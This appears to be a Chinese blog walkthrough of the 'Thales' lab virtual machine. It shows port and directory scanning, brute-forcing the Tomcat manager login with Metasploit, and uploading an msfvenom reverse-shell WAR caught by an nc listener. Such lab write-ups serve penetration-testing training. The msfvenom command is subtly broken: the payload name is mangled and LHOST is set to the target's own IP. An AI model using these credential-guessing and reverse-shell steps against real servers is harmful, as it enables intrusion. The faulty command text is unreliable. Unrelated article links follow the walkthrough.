当前位置: 首页 > news >正文

Thales靶场通关攻略

news 2025/8/2 1:53:39

将下载好的环境导入 VritualBox,并将桥接模式

使用kali扫描靶机ip和端口,得出靶机ip为172.16.2.46      端口开着8080和22

dirsearch目录扫描

dirsearch -u 172.16.2.46:8080 -e * -x 403 --random-agent

访问靶机8080

尝试登陆后台,发现需要用户名和密码,我们使用msf爆破账号和密码

进入msf:msfconsole

msf6 > search tomcat login
msf6 > use 0
msf6 auxiliary(scanner/http/tomcat_mgr_login) > show options

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 172.16.2.46

msf6 auxiliary(scanner/http/tomcat_mgr_login) > run

得到用户名和密码:tomcat;role1

登陆后台,下拉发现可以上传文件

反弹shell

我们可以看到/shell和上传页面,那么我们进行shell,在 web 应用程序部署界面尝试在上传 war 包反弹 shell

msfvenom -p javajsp_shell_reverse_tcp LHOST=172.16.2.46 LPORT=6666 -f war -o revshell.war

我们进行上传

上传成功后,在应用程序列表中看到已成功部署了 war 后门,点击访问后反弹

kali里面提前开启nc监听

点击后即可在kali监听到

http://www.dtcms.com/a/306804.html

相关文章:

  • 【25-cv-08323】Keith携Olha Moroz13张版权画发案!
  • JAVAEE--4.多线程案例
  • Kettle 开源ETL数据迁移工具从入门到实战
  • 【swoole Windows 开发(swoole-cli 开发 hyperf)】
  • SpringBoot升级2.5.3 2.6.8
  • 原生C++实现信号与槽机制:原理详解
  • 【案例教程】基于python多光谱遥感数据处理、图像分类、定量评估及机器学习方法应用
  • 自定义Linux登录前的欢迎信息
  • 无人机入门--个人笔记
  • Set集合
  • Windows管理用户脚本
  • 多元线性回归方程的原理解析与案例
  • 【硬件】Verilog相关
  • 高程DEM文件下载
  • 开发避坑短篇(9):解决升级Vue3后slot attributes废弃警告
  • 电子电气架构 --- 区域架构让未来汽车成为现实
  • 电力设施通道防外破防异物实时监控预警装置的核心功能是什么
  • VoIP技术全面深度学习指南:从原理到实践的认知进化
  • 0730 数据结构重点整理
  • laravel计划任务和异步队列任务,拆分成不同队列,减少计划任务系统压力
  • Redis知识点(1)
  • vulhub-ica1靶场攻略
  • 基于C语言实现的KV存储引擎(一)
  • 串行化:MYSQL事务隔离级别中的终极防护
  • VMware16安装Ubuntu-22.04.X版本(并使用桥接模式实现局域网下使用ssh远程操作Ubuntu系统)
  • JVM对象创建与内存分配机制深度剖析
  • 打靶日记-RCE-labs
  • 把Java程序部署到本地Docker
  • Python奇幻之旅:从零开始的编程冒险
  • 编程算法:从理论基石到产业变革的核心驱动力